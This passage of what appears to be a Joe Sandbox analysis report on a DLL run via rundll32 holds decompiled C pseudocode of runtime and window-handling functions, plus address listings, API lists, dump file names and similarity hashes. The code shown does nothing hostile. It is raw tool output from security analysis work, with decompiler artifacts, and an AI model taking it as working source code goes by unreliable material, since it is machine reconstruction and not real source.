							 *(_t168 - 0x34) =  *(_t168 + 8);
							goto L17;
						}
						if(_t128 == 5) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1003A087();
							asm("fst qword [ebp-0x24]");
							L27:
							 *(_t168 - 0x34) = _t182;
							goto L17;
						}
						if(_t128 == 7) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1003A087();
							asm("fst qword [ebp-0x24]");
							goto L27;
						}
						if(_t128 <= 0x13 || _t128 > 0x15) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							_t147 = E1003A087();
						} else {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							 *(_t168 - 0x34) = E1003A087();
							 *((intOrPtr*)(_t168 - 0x30)) = _t153;
						}
						goto L17;
					}
					goto L9;
				}
				_t17 = _t161 + 3; // 0x3
				_t158 = _t17;
				_t134 = E10001000(_t148, _t17);
				_pop(_t148);
				if(_t134 == 0) {
					goto L9;
				}
				E10010B20(_t158 + 0x00000003 & 0xfffffffc, _t148);
				 *(_t168 - 0x10) = _t171;
				_t159 = _t171;
				E10011440(_t159,  *(_t168 + 8), _t161);
				_t140 = _t144[0xc];
				_t171 =  &(_t171[0xc]);
				 *(_t168 + 8) = _t159;
				if(_t140 == 8) {
					_t140 = 0xe;
				}
				_t159[_t161] = 0xff;
				_t167 = _t161 + 1;
				 *(_t168 - 0x1c) =  *(_t168 - 0x1c) & 0x00000000;
				_t159[_t167] = _t140;
				_t159[_t167 + 1] = 0;
				 *(_t168 - 0x18) = _t144[0x14];
				goto L7;
			}
































                                                                                                            0x100394b0
                                                                                                            0x100394b0
                                                                                                            0x100394b5
                                                                                                            0x100394ba
                                                                                                            0x100394be
                                                                                                            0x100394c1
                                                                                                            0x100394c8
                                                                                                            0x100394cb
                                                                                                            0x100394ce
                                                                                                            0x100394d2
                                                                                                            0x100394d5
                                                                                                            0x100394da
                                                                                                            0x100394da
                                                                                                            0x100394ea
                                                                                                            0x100394ef
                                                                                                            0x100394f6
                                                                                                            0x100394fa
                                                                                                            0x10039554
                                                                                                            0x10039554
                                                                                                            0x1003955e
                                                                                                            0x10039565
                                                                                                            0x10039566
                                                                                                            0x100395aa
                                                                                                            0x100395aa
                                                                                                            0x10039762
                                                                                                            0x10039768
                                                                                                            0x10039773
                                                                                                            0x10039773
                                                                                                            0x10039576
                                                                                                            0x1003957b
                                                                                                            0x1003957e
                                                                                                            0x10039587
                                                                                                            0x1003958c
                                                                                                            0x1003959a
                                                                                                            0x1003959c
                                                                                                            0x1003959c
                                                                                                            0x100395a0
                                                                                                            0x100395a7
                                                                                                            0x100395a8
                                                                                                            0x100395bc
                                                                                                            0x100395c4
                                                                                                            0x100395c7
                                                                                                            0x100395db
                                                                                                            0x100395e0
                                                                                                            0x100395e4
                                                                                                            0x100395e7
                                                                                                            0x10039625
                                                                                                            0x10039625
                                                                                                            0x10039628
                                                                                                            0x1003962c
                                                                                                            0x10039631
                                                                                                            0x1003964c
                                                                                                            0x1003964c
                                                                                                            0x10039651
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039657
                                                                                                            0x1003965c
                                                                                                            0x1003972d
                                                                                                            0x10039730
                                                                                                            0x10039757
                                                                                                            0x1003975a
                                                                                                            0x1003975a
                                                                                                            0x10039760
                                                                                                            0x10039760
                                                                                                            0x00000000
                                                                                                            0x10039760
                                                                                                            0x10039732
                                                                                                            0x10039733
                                                                                                            0x1003973d
                                                                                                            0x1003973f
                                                                                                            0x10039744
                                                                                                            0x10039744
                                                                                                            0x00000000
                                                                                                            0x1003973f
                                                                                                            0x10039735
                                                                                                            0x10039738
                                                                                                            0x1003974d
                                                                                                            0x00000000
                                                                                                            0x1003974d
                                                                                                            0x1003973b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003973b
                                                                                                            0x10039662
                                                                                                            0x10039665
                                                                                                            0x1003966b
                                                                                                            0x10039671
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039677
                                                                                                            0x00000000
                                                                                                            0x1003971a
                                                                                                            0x1003971a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100396f3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039706
                                                                                                            0x10039709
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039711
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100396f8
                                                                                                            0x100396fb
                                                                                                            0x100396fe
                                                                                                            0x10039701
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039716
                                                                                                            0x10039718
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039723
                                                                                                            0x10039724
                                                                                                            0x10039725
                                                                                                            0x10039726
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100396ee
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039677
                                                                                                            0x10039639
                                                                                                            0x1003963c
                                                                                                            0x10039642
                                                                                                            0x10039646
                                                                                                            0x10039647
                                                                                                            0x00000000
                                                                                                            0x10039639
                                                                                                            0x100395e9
                                                                                                            0x100395f0
                                                                                                            0x100395f3
                                                                                                            0x100396b0
                                                                                                            0x100396b1
                                                                                                            0x100396b2
                                                                                                            0x100396b5
                                                                                                            0x100396ba
                                                                                                            0x100396c0
                                                                                                            0x00000000
                                                                                                            0x100396c0
                                                                                                            0x100395fc
                                                                                                            0x1003969b
                                                                                                            0x1003969c
                                                                                                            0x1003969d
                                                                                                            0x100396a0
                                                                                                            0x100396a5
                                                                                                            0x100396a8
                                                                                                            0x100396a8
                                                                                                            0x00000000
                                                                                                            0x100396a8
                                                                                                            0x10039605
                                                                                                            0x1003968c
                                                                                                            0x1003968d
                                                                                                            0x1003968e
                                                                                                            0x10039691
                                                                                                            0x10039696
                                                                                                            0x00000000
                                                                                                            0x10039696
                                                                                                            0x1003960e
                                                                                                            0x1003967e
                                                                                                            0x1003967f
                                                                                                            0x10039680
                                                                                                            0x10039688
                                                                                                            0x10039615
                                                                                                            0x10039615
                                                                                                            0x10039616
                                                                                                            0x10039617
                                                                                                            0x1003961f
                                                                                                            0x10039622
                                                                                                            0x10039622
                                                                                                            0x00000000
                                                                                                            0x1003960e
                                                                                                            0x00000000
                                                                                                            0x100395a8
                                                                                                            0x100394fc
                                                                                                            0x100394fc
                                                                                                            0x10039500
                                                                                                            0x10039507
                                                                                                            0x10039508
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039516
                                                                                                            0x1003951b
                                                                                                            0x1003951e
                                                                                                            0x10039525
                                                                                                            0x1003952a
                                                                                                            0x1003952e
                                                                                                            0x10039535
                                                                                                            0x10039538
                                                                                                            0x1003953c
                                                                                                            0x1003953c
                                                                                                            0x1003953d
                                                                                                            0x10039541
                                                                                                            0x10039542
                                                                                                            0x10039546
                                                                                                            0x10039549
                                                                                                            0x10039551
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 100394B5
                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 100394E0
                                                                                                            • VariantClear.OLEAUT32(0000000C), ref: 1003963C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClearH_prologVariantlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2416264355-0
                                                                                                            • Opcode ID: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
                                                                                                            • Instruction ID: 794d22016aebeea8945113baaba77667614d3c7e1eb394332e3a898872445e5b
                                                                                                            • Opcode Fuzzy Hash: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
                                                                                                            • Instruction Fuzzy Hash: 8381B13590465AEFCF12CFA9C881A9EBBB5FF05391F208115F854AF291D735EA90CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10018BEF Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E10018BEF(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __edi;
				void* __ebp;
				intOrPtr* _t89;
				void* _t90;
				void* _t101;
				intOrPtr _t112;
				void* _t115;
				signed int _t120;
				signed int _t125;
				intOrPtr _t132;
				intOrPtr _t133;
				void* _t138;
				intOrPtr _t140;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				void* _t159;
				intOrPtr _t162;
				signed int _t164;
				signed int _t165;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				intOrPtr _t174;
				void* _t176;
				intOrPtr _t180;

				_t89 = _a4;
				_v12 = _v12 & 0x00000000;
				_t133 =  *((intOrPtr*)(_t89 + 4));
				_t162 =  *_t89;
				_v24 = _t162;
				_v20 = _t133;
				_t90 = E1001519D(_t162);
				_t174 = _t133;
				_t172 = _t90;
				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
					L28:
					return 0;
				} else {
					_t176 = _t133 - 0x1000;
					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
						goto L28;
					} else {
						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
							L9:
							_t173 =  *((intOrPtr*)(_t172 + 0x44));
							L10:
							_t142 = E10013780(_t162, _t133, 0x1e13380, 0) + 0x46;
							_t10 = _t142 + 0x12b; // 0xe5
							asm("cdq");
							_t15 = _t142 - 1; // -71
							_v16 = _t15;
							_v8 = _t142;
							asm("cdq");
							_t164 = 0x64;
							_t165 = 4;
							asm("cdq");
							_t28 = _v16 / _t165 - 0x11; // 0xd4
							asm("cdq");
							_t29 = _t142 - 0x46; // -140
							asm("cdq");
							_t101 = E100122A0(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
							asm("sbb edx, ebx");
							_t138 = 0x15180;
							_t168 = _v24 + E100122A0(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
							asm("adc [ebp-0x10], edx");
							_t180 = _v20;
							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
								asm("cdq");
								_t143 = 4;
								if(_v8 % _t143 != 0) {
									L19:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										goto L21;
									}
									goto L20;
								}
								asm("cdq");
								_t149 = 0x64;
								_t158 = _v8 % _t149;
								if(_v8 % _t149 != 0) {
									goto L20;
								}
								goto L19;
							} else {
								_t125 = _v16;
								_v8 = _t125;
								_t168 = _t168 + 0x1e13380;
								asm("adc dword [ebp-0x10], 0x0");
								asm("cdq");
								_t150 = 4;
								if(_t125 % _t150 != 0) {
									L15:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										L21:
										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
										 *((intOrPtr*)(_t173 + 0x1c)) = E10013780(_t168, _v20, _t138, 0);
										asm("cdq");
										_t169 = _t168 + E100122A0(_t110, _t158, 0xfffeae80, 0xffffffff);
										asm("adc [ebp-0x10], edx");
										_t159 = 0x1004ce98;
										if(_v12 == 0) {
											_t159 = 0x1004cecc;
										}
										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
										_t146 = 1;
										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
											L27:
											_t147 = _t146 - 1;
											 *(_t173 + 0x10) = _t147;
											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
											_t115 = E10013780( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
											_t148 = 7;
											asm("cdq");
											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
											 *((intOrPtr*)(_t173 + 8)) = E10013780(_t169, _v20, 0xe10, 0);
											asm("cdq");
											_t170 = _t169 + E100122A0(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
											asm("adc [ebp-0x10], edx");
											_t120 = E10013780(_t170, _v20, 0x3c, 0);
											 *(_t173 + 4) = _t120;
											 *_t173 = _t170 - _t120 * 0x3c;
											 *((intOrPtr*)(_t173 + 0x20)) = 0;
											return _t173;
										} else {
											_t140 = _t112;
											do {
												_t146 = _t146 + 1;
											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
											_t138 = 0x15180;
											goto L27;
										}
									}
									L16:
									_t168 = _t168 + _t138;
									asm("adc dword [ebp-0x10], 0x0");
									L20:
									_v12 = 1;
									goto L21;
								}
								asm("cdq");
								_t152 = 0x64;
								_t158 = _v8 % _t152;
								if(_v8 % _t152 != 0) {
									goto L16;
								}
								goto L15;
							}
						}
						_t132 = E100107B6(0x24);
						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
						if(_t132 != 0) {
							goto L9;
						}
						_t173 = 0x1004f744;
						goto L10;
					}
				}
			}









































                                                                                                            0x10018bf5
                                                                                                            0x10018bf8
                                                                                                            0x10018bfd
                                                                                                            0x10018c02
                                                                                                            0x10018c04
                                                                                                            0x10018c07
                                                                                                            0x10018c0a
                                                                                                            0x10018c0f
                                                                                                            0x10018c11
                                                                                                            0x10018c13
                                                                                                            0x10018e0d
                                                                                                            0x00000000
                                                                                                            0x10018c23
                                                                                                            0x10018c23
                                                                                                            0x10018c29
                                                                                                            0x00000000
                                                                                                            0x10018c39
                                                                                                            0x10018c3d
                                                                                                            0x10018c55
                                                                                                            0x10018c55
                                                                                                            0x10018c58
                                                                                                            0x10018c68
                                                                                                            0x10018c6b
                                                                                                            0x10018c71
                                                                                                            0x10018c7b
                                                                                                            0x10018c7e
                                                                                                            0x10018c81
                                                                                                            0x10018c88
                                                                                                            0x10018c89
                                                                                                            0x10018c8e
                                                                                                            0x10018c9b
                                                                                                            0x10018c9e
                                                                                                            0x10018ca2
                                                                                                            0x10018ca5
                                                                                                            0x10018caa
                                                                                                            0x10018cad
                                                                                                            0x10018cb4
                                                                                                            0x10018cb8
                                                                                                            0x10018cc8
                                                                                                            0x10018cca
                                                                                                            0x10018ccd
                                                                                                            0x10018cd1
                                                                                                            0x10018d21
                                                                                                            0x10018d22
                                                                                                            0x10018d27
                                                                                                            0x10018d36
                                                                                                            0x10018d3e
                                                                                                            0x10018d44
                                                                                                            0x10018d48
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018d48
                                                                                                            0x10018d2e
                                                                                                            0x10018d2f
                                                                                                            0x10018d30
                                                                                                            0x10018d34
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018cd9
                                                                                                            0x10018cd9
                                                                                                            0x10018cdc
                                                                                                            0x10018cdf
                                                                                                            0x10018ce5
                                                                                                            0x10018ceb
                                                                                                            0x10018cec
                                                                                                            0x10018cf1
                                                                                                            0x10018d00
                                                                                                            0x10018d08
                                                                                                            0x10018d0e
                                                                                                            0x10018d12
                                                                                                            0x10018d51
                                                                                                            0x10018d5a
                                                                                                            0x10018d65
                                                                                                            0x10018d68
                                                                                                            0x10018d75
                                                                                                            0x10018d77
                                                                                                            0x10018d7e
                                                                                                            0x10018d83
                                                                                                            0x10018d85
                                                                                                            0x10018d85
                                                                                                            0x10018d8a
                                                                                                            0x10018d8f
                                                                                                            0x10018d93
                                                                                                            0x10018da2
                                                                                                            0x10018da2
                                                                                                            0x10018da3
                                                                                                            0x10018dab
                                                                                                            0x10018db7
                                                                                                            0x10018dc1
                                                                                                            0x10018dc2
                                                                                                            0x10018dd1
                                                                                                            0x10018ddb
                                                                                                            0x10018dde
                                                                                                            0x10018dec
                                                                                                            0x10018dee
                                                                                                            0x10018df7
                                                                                                            0x10018dfc
                                                                                                            0x10018e04
                                                                                                            0x10018e06
                                                                                                            0x00000000
                                                                                                            0x10018d95
                                                                                                            0x10018d95
                                                                                                            0x10018d97
                                                                                                            0x10018d97
                                                                                                            0x10018d98
                                                                                                            0x10018d9d
                                                                                                            0x00000000
                                                                                                            0x10018d9d
                                                                                                            0x10018d93
                                                                                                            0x10018d14
                                                                                                            0x10018d14
                                                                                                            0x10018d16
                                                                                                            0x10018d4a
                                                                                                            0x10018d4a
                                                                                                            0x00000000
                                                                                                            0x10018d4a
                                                                                                            0x10018cf8
                                                                                                            0x10018cf9
                                                                                                            0x10018cfa
                                                                                                            0x10018cfe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018cfe
                                                                                                            0x10018cd1
                                                                                                            0x10018c41
                                                                                                            0x10018c49
                                                                                                            0x10018c4c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018c4e
                                                                                                            0x00000000
                                                                                                            0x10018c4e
                                                                                                            0x10018c29

                                                                                                            APIs
                                                                                                              • Part of subcall function 1001519D: GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                                                              • Part of subcall function 1001519D: FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                                                              • Part of subcall function 1001519D: FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                                                              • Part of subcall function 1001519D: GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                                                              • Part of subcall function 1001519D: SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018D5E
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DB7
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DD4
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DF7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 223281555-0
                                                                                                            • Opcode ID: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                                                            • Instruction ID: 428b4c813f629567aa63a678bca7b6061bdb39fa1b2836493da5e96e2c7cad82
                                                                                                            • Opcode Fuzzy Hash: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                                                            • Instruction Fuzzy Hash: 3361B1B6A00306ABD714DEA9CC41BAEB3F6EB84354F25452DF5119B2C1D7B5EB808B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002D821 Relevance: 7.7, APIs: 5, Instructions: 204windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 59%
                                                                                                            			E1002D821(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				signed char _t75;
				signed int _t80;
				signed int _t81;
				signed int _t85;
				signed int _t87;
				void* _t95;
				intOrPtr _t125;
				intOrPtr _t133;
				void* _t147;
				void* _t151;
				intOrPtr _t155;
				void* _t158;
				void* _t160;

				_t147 = __edx;
				_t158 = _t160 - 0xb0;
				_t70 =  *0x1004c470; // 0x6edecb8c
				_t155 =  *((intOrPtr*)(_t158 + 0xb8));
				 *((intOrPtr*)(_t158 + 0xac)) = _t70;
				_t125 = __ecx;
				_t72 = GetWindowRect( *(_t155 + 0x1c), _t158 - 0x80);
				if( *((intOrPtr*)(_t155 + 0x88)) != _t125 ||  *(_t158 + 0xbc) != 0 && EqualRect(_t158 - 0x80,  *(_t158 + 0xbc)) == 0) {
					if( *((intOrPtr*)(_t125 + 0x90)) != 0 && ( *(_t155 + 0x80) & 0x00000040) != 0) {
						 *(_t125 + 0x7c) =  *(_t125 + 0x7c) | 0x00000040;
					}
					 *(_t125 + 0x7c) =  *(_t125 + 0x7c) & 0xfffffff9;
					_t75 =  *(_t155 + 0x7c) & 0x00000006 |  *(_t125 + 0x7c);
					 *(_t125 + 0x7c) = _t75;
					if((_t75 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t158 - 0x58);
						E1002095F(_t155);
						E10029B23(_t155,  *((intOrPtr*)(_t125 + 0x1c)), _t158 - 0x58);
					}
					_t80 = ( *(_t155 + 0x7c) ^  *(_t125 + 0x7c)) & 0x0000f000 ^  *(_t155 + 0x7c) | 0x00000f00;
					if( *((intOrPtr*)(_t125 + 0x90)) == 0) {
						_t81 = _t80 & 0xfffffffe;
					} else {
						_t81 = _t80 | 0x00000001;
					}
					E100383D0(_t155, _t81);
					 *((intOrPtr*)(_t158 - 0x6c)) = 0;
					if( *((intOrPtr*)(_t155 + 0x88)) != _t125 && IsWindowVisible( *(_t155 + 0x1c)) != 0) {
						E100204FE(_t155, 0, 0, 0, 0, 0, 0x97);
						 *((intOrPtr*)(_t158 - 0x6c)) = 1;
					}
					 *(_t158 - 0x70) =  *(_t158 - 0x70) | 0xffffffff;
					if( *(_t158 + 0xbc) == 0) {
						_t57 = _t125 + 0x94; // 0x94
						_t150 = _t57;
						E1001E2BE(_t57, _t158,  *((intOrPtr*)(_t57 + 8)), _t155);
						E1001E2BE(_t150, _t158,  *((intOrPtr*)(_t150 + 8)), 0);
						_t85 =  *0x1004efa4; // 0x2
						_t151 = 0;
						_t87 =  *0x1004efa0; // 0x2
						E100204FE(_t155, 0,  ~_t87,  ~_t85, 0, 0, 0x115);
					} else {
						CopyRect(_t158 - 0x68,  *(_t158 + 0xbc));
						E10028E5A(_t125, _t158 - 0x68);
						asm("cdq");
						asm("cdq");
						_push(( *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)) - _t147 >> 1) +  *((intOrPtr*)(_t158 - 0x64)));
						_push(( *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68) - _t147 >> 1) +  *(_t158 - 0x68));
						_push( *((intOrPtr*)(_t158 + 0xb8)));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t158 - 0x70) = E1002CE2A(_t125);
						E100204FE( *((intOrPtr*)(_t158 + 0xb8)), 0,  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x64)),  *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)), 0x114);
						_t155 =  *((intOrPtr*)(_t158 + 0xb8));
						_t151 = 0;
					}
					if(E100220EE(_t158, GetParent( *(_t155 + 0x1c))) != _t125) {
						E1000870E(_t155, _t125);
					}
					_t133 =  *((intOrPtr*)(_t155 + 0x88));
					if(_t133 != _t125) {
						if(_t133 != _t151) {
							if( *((intOrPtr*)(_t125 + 0x90)) == _t151 ||  *((intOrPtr*)(_t133 + 0x90)) != _t151) {
								_t95 = 0;
							} else {
								_t95 = 1;
							}
							_push(_t95);
							_push(0xffffffff);
							goto L27;
						}
					} else {
						_push(_t151);
						_push( *(_t158 - 0x70));
						L27:
						_push(_t155);
						E1002D1B2(_t133);
					}
					 *((intOrPtr*)(_t155 + 0x88)) = _t125;
					if( *((intOrPtr*)(_t158 - 0x6c)) != _t151) {
						E100204FE(_t155, _t151, _t151, _t151, _t151, _t151, 0x57);
					}
					E1002D14B(_t125, _t125, _t158, _t155);
					 *(E100314D8(_t125) + 0xcc) =  *(_t72 + 0xcc) | 0x0000000c;
				}
				return E100117AE(_t72,  *((intOrPtr*)(_t158 + 0xac)));
			}




















                                                                                                            0x1002d821
                                                                                                            0x1002d822
                                                                                                            0x1002d82f
                                                                                                            0x1002d836
                                                                                                            0x1002d83c
                                                                                                            0x1002d84a
                                                                                                            0x1002d84c
                                                                                                            0x1002d85a
                                                                                                            0x1002d886
                                                                                                            0x1002d891
                                                                                                            0x1002d891
                                                                                                            0x1002d895
                                                                                                            0x1002d8a2
                                                                                                            0x1002d8a6
                                                                                                            0x1002d8a9
                                                                                                            0x1002d8ab
                                                                                                            0x1002d8b3
                                                                                                            0x1002d8b6
                                                                                                            0x1002d8c2
                                                                                                            0x1002d8c2
                                                                                                            0x1002d8d5
                                                                                                            0x1002d8e0
                                                                                                            0x1002d8e7
                                                                                                            0x1002d8e2
                                                                                                            0x1002d8e2
                                                                                                            0x1002d8e2
                                                                                                            0x1002d8ed
                                                                                                            0x1002d8f8
                                                                                                            0x1002d8fb
                                                                                                            0x1002d916
                                                                                                            0x1002d91b
                                                                                                            0x1002d91b
                                                                                                            0x1002d922
                                                                                                            0x1002d92c
                                                                                                            0x1002d9b9
                                                                                                            0x1002d9b9
                                                                                                            0x1002d9c5
                                                                                                            0x1002d9d1
                                                                                                            0x1002d9d6
                                                                                                            0x1002d9e0
                                                                                                            0x1002d9e7
                                                                                                            0x1002d9f2
                                                                                                            0x1002d932
                                                                                                            0x1002d93c
                                                                                                            0x1002d948
                                                                                                            0x1002d956
                                                                                                            0x1002d966
                                                                                                            0x1002d96e
                                                                                                            0x1002d96f
                                                                                                            0x1002d975
                                                                                                            0x1002d97b
                                                                                                            0x1002d97c
                                                                                                            0x1002d97d
                                                                                                            0x1002d980
                                                                                                            0x1002d98c
                                                                                                            0x1002d9aa
                                                                                                            0x1002d9af
                                                                                                            0x1002d9b5
                                                                                                            0x1002d9b5
                                                                                                            0x1002da08
                                                                                                            0x1002da0d
                                                                                                            0x1002da0d
                                                                                                            0x1002da12
                                                                                                            0x1002da1a
                                                                                                            0x1002da24
                                                                                                            0x1002da2c
                                                                                                            0x1002da3b
                                                                                                            0x1002da36
                                                                                                            0x1002da38
                                                                                                            0x1002da38
                                                                                                            0x1002da3d
                                                                                                            0x1002da3e
                                                                                                            0x00000000
                                                                                                            0x1002da3e
                                                                                                            0x1002da1c
                                                                                                            0x1002da1c
                                                                                                            0x1002da1d
                                                                                                            0x1002da40
                                                                                                            0x1002da40
                                                                                                            0x1002da41
                                                                                                            0x1002da41
                                                                                                            0x1002da49
                                                                                                            0x1002da4f
                                                                                                            0x1002da5a
                                                                                                            0x1002da5a
                                                                                                            0x1002da62
                                                                                                            0x1002da6e
                                                                                                            0x1002da6e
                                                                                                            0x1002da8a

                                                                                                            APIs
                                                                                                            • GetWindowRect.USER32 ref: 1002D84C
                                                                                                            • EqualRect.USER32 ref: 1002D872
                                                                                                            • IsWindowVisible.USER32(?), ref: 1002D900
                                                                                                            • CopyRect.USER32 ref: 1002D93C
                                                                                                            • GetParent.USER32(?), ref: 1002D9FA
                                                                                                              • Part of subcall function 1000870E: SetParent.USER32(?,00000000,1002ADB9,00007FFF,?,00000000,?), ref: 1000871D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
